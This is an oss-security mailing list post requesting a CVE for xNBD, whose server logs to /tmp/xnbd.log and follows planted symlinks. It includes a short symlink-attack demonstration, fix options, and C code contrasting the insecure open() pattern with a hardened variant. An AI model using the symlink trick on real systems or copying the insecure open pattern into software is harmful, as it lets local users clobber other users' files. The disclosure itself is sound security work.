Date: Wed, 06 Feb 2013 17:48:59 +0100
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
Subject: CVE request: Insecure default log file path in xNBD

Hello oss-security!


Target software
===============

xNBD upstream
   https://bitbucket.org/hirofuchi/xnbd

Official Debian packages
   http://packages.debian.org/sid/xnbd-server


Description
===========

xnbd-server (and xnbd-wrapper in some releases) log to /tmp/xnbd.log
when --daemonize is given without --logpath FILE.

The file is opened with flags O_WRONLY | O_CREAT | O_APPEND, so it
follows a symlink planted at that path and is vulnerable to symlink
attacks.


Demonstration
=============

Here is an exploitation example:

   $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

   $ touch DISK
   $ truncate --size=$((100*1024**2)) DISK

   $ /usr/sbin/xnbd-server --daemonize --target DISK
   xnbd-server(12462) msg: daemonize enabled
   xnbd-server(12462) msg: cmd target mode
   xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
   xnbd-server(12462) msg: xnbd master initialization done
   xnbd-server(12462) msg: logfile /tmp/xnbd.log

   $ ls -l ~/ATTACK_TARGET
   -rw------- 1 user123 user123 653 Feb  1 16:41 \
     /home/user123/ATTACK_TARGET


Affected versions
=================

The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

----------------------------------------------------------------------
   Version                        Status
----------------------------------------------------------------------
   0.0.x                          not analyzed
   0.1.0-pre                      VULNERABLE (xnbd-server only)
   0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
   Mercurial tip                  not vulnerable
----------------------------------------------------------------------


Options for a fix
=================

  a) Use syslog with --daemonize and no default file location in general
     (i.e. what upstream did)

  b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
     for the hard-coded defaults

  c) Replace flag O_APPEND by O_EXCL  (secure but reduces functionality)

The attached patch applies approach (b) to version 
0.1.0-pre-hg20-e75b93a47722.
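As an added example (not xNBD's own code), the open() pattern from the
Description next to a hardened variant that combines option (c) with
O_NOFOLLOW, checked against a constructed dangling symlink in a private
mkdtemp() directory rather than a shared /tmp name:

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern from the report: a symlink at `path` is silently followed
 * and whatever it points to is created or appended to. */
int open_log_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
}

/* Hardened variant: O_EXCL refuses an existing path (including a symlink,
 * EEXIST) and O_NOFOLLOW refuses a symlink outright (ELOOP). */
int open_log_hardened(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Returns 1 if the insecure open followed the planted symlink while the
 * hardened open refused it, -1 on setup error, 0 otherwise. The
 * directory, link and target names are constructed for this demo. */
int demo_symlink_refused(void) {
    char dir[] = "/tmp/xnbd-demo-XXXXXX";   /* mkdtemp template */
    char target[256], link[256];
    int fd, followed, refused;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/xnbd.log", dir);
    if (symlink(target, link) != 0) return -1; /* dangling link, as in the report */

    fd = open_log_insecure(link);             /* creates `victim` through the link */
    followed = (fd >= 0) && (access(target, F_OK) == 0);
    if (fd >= 0) close(fd);

    unlink(target);                           /* make the link dangling again */
    fd = open_log_hardened(link);             /* must fail and create nothing */
    refused = (fd < 0) && (access(target, F_OK) != 0);
    if (fd >= 0) close(fd);

    unlink(link); unlink(target); rmdir(dir); /* clean up */
    return followed && refused;
}
```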


Best,



Sebastian

View attachment "xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch" of type "text/x-patch" (6162 bytes)
